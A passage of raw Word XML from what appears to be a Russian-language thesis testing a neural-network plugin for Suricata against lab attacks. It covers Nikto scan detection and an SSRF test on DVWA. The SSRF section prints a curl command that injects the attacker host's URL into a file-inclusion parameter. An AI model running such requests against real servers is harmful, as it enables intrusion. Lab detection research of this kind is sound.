          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33911877" wp14:editId="13407789">
            <wp:extent cx="6243774" cy="2695575"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="2136928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28772" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6318411" cy="2727798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C59CD" w14:textId="5A02D816" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение сканирования компонентов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDE01E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BBC627"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t>Нейросетевой плагин успешно идентифицировал активность как аномальную</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: обнаружила сканирование </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, так как данный инструмент имеет характерные сигнатуры в наборе правил. Правило "ET SCAN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>" сработало 89 раз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD852F"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B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>89 с</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>121</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB2CB3" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001D324E" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704E9F0C" w14:textId="5693A04C" w:rsidR="008E0171" w:rsidRPr="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.14 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 14. Подделка запроса на стороне сервера </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A224696" w14:textId="73B05713" w:rsidR="009A57A4" w:rsidRPr="009A57A4" w:rsidRDefault="009A57A4" w:rsidP="009A57A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подделка запроса на стороне сервера (Server-Side </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, SSRF) — тип атаки, при котором злоумышленник вынуждает сервер выполнять запросы к произвольным ресурсам от его имени, что позволяет получить доступ к внутренним сервисам инфраструктуры, недоступным напрямую из внешней сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13388F44"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t>SSRF-атака направлена на принуждение сервера к выполнению запросов к произвольным ресурсам от имени самого сервера. Для проведения теста использовалась</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>уязвимость</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DVWA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBABF9" w14:textId="77777777" w:rsidR="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="00772345">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDCD993" w14:textId="1AA72C64" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00772345">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl b cookies.txt </w:t>
      </w:r>
      <w:r w:rsidR="00772345" w:rsidRPr="00772345">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.0.104/vulnerabilities/fi/?page=http://192.168.0.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C6A6B" w14:textId="77777777" w:rsidR="00772345" w:rsidRPr="001D324E" w:rsidRDefault="00772345" w:rsidP="00772345">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6293CD3E" w14:textId="41ABF910"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1D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В результате выполнения данного запроса целевой сервер (192.168.0.104) обращался к IP-адресу атакующей машины (192.168.0.101), что создавало нетипичный паттерн исходящего трафика. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66792">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00772345">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66792">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35B2A4"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p>
    <w:p w14:paraId="361325BB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="004961D0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05EA19B1" wp14:editId="0660175F">
            <wp:extent cx="6156325" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1877883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83848" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6168700" cy="2424213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979F001" w14:textId="7F896BFC" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="0099286E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00772345">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение подделки запроса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F2723" w14:textId="77777777" w:rsidR="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="0099286E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F91F6C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В ходе тестирования выявлено, что SSRF-атака, реализованная через единичный HTTP-запрос к уязвимому параметру File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, не была </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обнаружена</w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> нейросетевым плагином. Это обусловлено архитектурным ограничением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">используемого </w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>подхода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ри малом объёме трафика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>менее 10 пакетов за сессию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>статистические характеристики потока</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>неотличимы от легитимного веб-трафика.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C618F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная проблема характерна для всех систем, анализирующих только метаданные потоков, и не является специфичной для разработанной модели.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
